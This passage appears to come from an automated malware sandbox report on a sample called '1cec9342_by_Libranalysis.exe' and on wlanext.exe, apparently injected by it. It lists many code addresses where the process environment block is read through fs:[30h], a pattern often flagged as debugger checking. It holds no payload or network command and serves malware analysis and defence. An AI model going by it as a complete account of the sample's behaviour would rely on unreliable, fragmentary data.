          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8D34 mov eax, dword ptr fs:[00000030h]1_2_00AE8D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A9A537 mov eax, dword ptr fs:[00000030h]1_2_00A9A537
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]1_2_00A44D3B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]1_2_00A44D3B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44D3B mov eax, dword ptr fs:[00000030h]1_2_00A44D3B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]1_2_00A3C577
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C577 mov eax, dword ptr fs:[00000030h]1_2_00A3C577
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A53D43 mov eax, dword ptr fs:[00000030h]1_2_00A53D43
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A93540 mov eax, dword ptr fs:[00000030h]1_2_00A93540
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A37D50 mov eax, dword ptr fs:[00000030h]1_2_00A37D50
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AE0EA5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AE0EA5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AE0EA5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A946A7 mov eax, dword ptr fs:[00000030h]1_2_00A946A7
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFE87 mov eax, dword ptr fs:[00000030h]1_2_00AAFE87
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A276E2 mov eax, dword ptr fs:[00000030h]1_2_00A276E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A416E0 mov ecx, dword ptr fs:[00000030h]1_2_00A416E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A58EC7 mov eax, dword ptr fs:[00000030h]1_2_00A58EC7
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A436CC mov eax, dword ptr fs:[00000030h]1_2_00A436CC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACFEC0 mov eax, dword ptr fs:[00000030h]1_2_00ACFEC0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8ED6 mov eax, dword ptr fs:[00000030h]1_2_00AE8ED6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1E620 mov eax, dword ptr fs:[00000030h]1_2_00A1E620
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACFE3F mov eax, dword ptr fs:[00000030h]1_2_00ACFE3F
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]1_2_00A1C600
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]1_2_00A1C600
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]1_2_00A1C600
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A48E00 mov eax, dword ptr fs:[00000030h]1_2_00A48E00
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1608 mov eax, dword ptr fs:[00000030h]1_2_00AD1608
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]1_2_00A4A61C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]1_2_00A4A61C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2766D mov eax, dword ptr fs:[00000030h]1_2_00A2766D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]1_2_00ADAE44
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]1_2_00ADAE44
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A28794 mov eax, dword ptr fs:[00000030h]1_2_00A28794
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]1_2_00A97794
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]1_2_00A97794
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]1_2_00A97794
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A537F5 mov eax, dword ptr fs:[00000030h]1_2_00A537F5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]1_2_00A14F2E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]1_2_00A14F2E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4E730 mov eax, dword ptr fs:[00000030h]1_2_00A4E730
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]1_2_00AE070D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]1_2_00AE070D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]1_2_00A4A70E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]1_2_00A4A70E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3F716 mov eax, dword ptr fs:[00000030h]1_2_00A3F716
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]1_2_00AAFF10
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]1_2_00AAFF10
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2FF60 mov eax, dword ptr fs:[00000030h]1_2_00A2FF60
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8F6A mov eax, dword ptr fs:[00000030h]1_2_00AE8F6A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2EF40 mov eax, dword ptr fs:[00000030h]1_2_00A2EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C138A mov eax, dword ptr fs:[00000030h]7_2_038C138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BD380 mov ecx, dword ptr fs:[00000030h]7_2_038BD380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03811B8F mov eax, dword ptr fs:[00000030h]7_2_03811B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03811B8F mov eax, dword ptr fs:[00000030h]7_2_03811B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383B390 mov eax, dword ptr fs:[00000030h]7_2_0383B390
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832397 mov eax, dword ptr fs:[00000030h]7_2_03832397
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D5BA5 mov eax, dword ptr fs:[00000030h]7_2_038D5BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]7_2_03834BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]7_2_03834BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]7_2_03834BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038853CA mov eax, dword ptr fs:[00000030h]7_2_038853CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038853CA mov eax, dword ptr fs:[00000030h]7_2_038853CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382DBE9 mov eax, dword ptr fs:[00000030h]7_2_0382DBE9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C131B mov eax, dword ptr fs:[00000030h]7_2_038C131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380DB40 mov eax, dword ptr fs:[00000030h]7_2_0380DB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8B58 mov eax, dword ptr fs:[00000030h]7_2_038D8B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380F358 mov eax, dword ptr fs:[00000030h]7_2_0380F358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380DB60 mov ecx, dword ptr fs:[00000030h]7_2_0380DB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03833B7A mov eax, dword ptr fs:[00000030h]7_2_03833B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03833B7A mov eax, dword ptr fs:[00000030h]7_2_03833B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383D294 mov eax, dword ptr fs:[00000030h]7_2_0383D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383D294 mov eax, dword ptr fs:[00000030h]7_2_0383D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381AAB0 mov eax, dword ptr fs:[00000030h]7_2_0381AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381AAB0 mov eax, dword ptr fs:[00000030h]7_2_0381AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383FAB0 mov eax, dword ptr fs:[00000030h]7_2_0383FAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832ACB mov eax, dword ptr fs:[00000030h]7_2_03832ACB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832AE4 mov eax, dword ptr fs:[00000030h]7_2_03832AE4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03818A0A mov eax, dword ptr fs:[00000030h]7_2_03818A0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov eax, dword ptr fs:[00000030h]7_2_03805210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov ecx, dword ptr fs:[00000030h]7_2_03805210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov eax, dword ptr fs:[00000030h]7_2_03805210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov eax, dword ptr fs:[00000030h]7_2_03805210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380AA16 mov eax, dword ptr fs:[00000030h]7_2_0380AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380AA16 mov eax, dword ptr fs:[00000030h]7_2_0380AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAA16 mov eax, dword ptr fs:[00000030h]7_2_038CAA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAA16 mov eax, dword ptr fs:[00000030h]7_2_038CAA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03823A1C mov eax, dword ptr fs:[00000030h]7_2_03823A1C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03844A2C mov eax, dword ptr fs:[00000030h]7_2_03844A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03844A2C mov eax, dword ptr fs:[00000030h]7_2_03844A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]7_2_03809240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]7_2_03809240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]7_2_03809240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]7_2_03809240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CEA55 mov eax, dword ptr fs:[00000030h]7_2_038CEA55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03894257 mov eax, dword ptr fs:[00000030h]7_2_03894257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BB260 mov eax, dword ptr fs:[00000030h]7_2_038BB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BB260 mov eax, dword ptr fs:[00000030h]7_2_038BB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8A62 mov eax, dword ptr fs:[00000030h]7_2_038D8A62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384927A mov eax, dword ptr fs:[00000030h]7_2_0384927A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382C182 mov eax, dword ptr fs:[00000030h]7_2_0382C182
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A185 mov eax, dword ptr fs:[00000030h]7_2_0383A185
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832990 mov eax, dword ptr fs:[00000030h]7_2_03832990
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038361A0 mov eax, dword ptr fs:[00000030h]7_2_038361A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038361A0 mov eax, dword ptr fs:[00000030h]7_2_038361A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038869A6 mov eax, dword ptr fs:[00000030h]7_2_038869A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]7_2_038851BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]7_2_038851BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]7_2_038851BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]7_2_038851BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038941E8 mov eax, dword ptr fs:[00000030h]7_2_038941E8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B1E1 mov eax, dword ptr fs:[00000030h]7_2_0380B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B1E1 mov eax, dword ptr fs:[00000030h]7_2_0380B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B1E1 mov eax, dword ptr fs:[00000030h]7_2_0380B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809100 mov eax, dword ptr fs:[00000030h]7_2_03809100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809100 mov eax, dword ptr fs:[00000030h]7_2_03809100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809100 mov eax, dword ptr fs:[00000030h]7_2_03809100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]7_2_03824120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]7_2_03824120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]7_2_03824120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]7_2_03824120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov ecx, dword ptr fs:[00000030h]7_2_03824120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383513A mov eax, dword ptr fs:[00000030h]7_2_0383513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383513A mov eax, dword ptr fs:[00000030h]7_2_0383513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382B944 mov eax, dword ptr fs:[00000030h]7_2_0382B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382B944 mov eax, dword ptr fs:[00000030h]7_2_0382B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380C962 mov eax, dword ptr fs:[00000030h]7_2_0380C962
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B171 mov eax, dword ptr fs:[00000030h]7_2_0380B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B171 mov eax, dword ptr fs:[00000030h]7_2_0380B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809080 mov eax, dword ptr fs:[00000030h]7_2_03809080
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03883884 mov eax, dword ptr fs:[00000030h]7_2_03883884
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03883884 mov eax, dword ptr fs:[00000030h]7_2_03883884
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]7_2_038320A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]7_2_038320A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]7_2_038320A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]7_2_038320A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]7_2_038320A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]7_2_038320A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038490AF mov eax, dword ptr fs:[00000030h]7_2_038490AF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383F0BF mov ecx, dword ptr fs:[00000030h]7_2_0383F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383F0BF mov eax, dword ptr fs:[00000030h]7_2_0383F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383F0BF mov eax, dword ptr fs:[00000030h]7_2_0383F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]7_2_0389B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0389B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]7_2_0389B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]7_2_0389B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]7_2_0389B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389B8D0 mov eax, dword ptr fs:[00000030h]7_2_0389B8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038058EC mov eax, dword ptr fs:[00000030h]7_2_038058EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D4015 mov eax, dword ptr fs:[00000030h]7_2_038D4015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D4015 mov eax, dword ptr fs:[00000030h]7_2_038D4015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887016 mov eax, dword ptr fs:[00000030h]7_2_03887016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887016 mov eax, dword ptr fs:[00000030h]7_2_03887016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887016 mov eax, dword ptr fs:[00000030h]7_2_03887016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B02A mov eax, dword ptr fs:[00000030h]7_2_0381B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B02A mov eax, dword ptr fs:[00000030h]7_2_0381B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B02A mov eax, dword ptr fs:[00000030h]7_2_0381B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B02A mov eax, dword ptr fs:[00000030h]7_2_0381B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]7_2_0383002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]7_2_0383002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]7_2_0383002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]7_2_0383002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383002D mov eax, dword ptr fs:[00000030h]7_2_0383002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03820050 mov eax, dword ptr fs:[00000030h]7_2_03820050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03820050 mov eax, dword ptr fs:[00000030h]7_2_03820050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D1074 mov eax, dword ptr fs:[00000030h]7_2_038D1074
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C2073 mov eax, dword ptr fs:[00000030h]7_2_038C2073
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03818794 mov eax, dword ptr fs:[00000030h]7_2_03818794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887794 mov eax, dword ptr fs:[00000030h]7_2_03887794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887794 mov eax, dword ptr fs:[00000030h]7_2_03887794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03887794 mov eax, dword ptr fs:[00000030h]7_2_03887794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038437F5 mov eax, dword ptr fs:[00000030h]7_2_038437F5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D070D mov eax, dword ptr fs:[00000030h]7_2_038D070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D070D mov eax, dword ptr fs:[00000030h]7_2_038D070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A70E mov eax, dword ptr fs:[00000030h]7_2_0383A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A70E mov eax, dword ptr fs:[00000030h]7_2_0383A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382F716 mov eax, dword ptr fs:[00000030h]7_2_0382F716
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389FF10 mov eax, dword ptr fs:[00000030h]7_2_0389FF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389FF10 mov eax, dword ptr fs:[00000030h]7_2_0389FF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03804F2E mov eax, dword ptr fs:[00000030h]7_2_03804F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03804F2E mov eax, dword ptr fs:[00000030h]7_2_03804F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383E730 mov eax, dword ptr fs:[00000030h]7_2_0383E730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381EF40 mov eax, dword ptr fs:[00000030h]7_2_0381EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381FF60 mov eax, dword ptr fs:[00000030h]7_2_0381FF60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8F6A mov eax, dword ptr fs:[00000030h]7_2_038D8F6A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0389FE87 mov eax, dword ptr fs:[00000030h]7_2_0389FE87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D0EA5 mov eax, dword ptr fs:[00000030h]7_2_038D0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D0EA5 mov eax, dword ptr fs:[00000030h]7_2_038D0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D0EA5 mov eax, dword ptr fs:[00000030h]7_2_038D0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038846A7 mov eax, dword ptr fs:[00000030h]7_2_038846A7
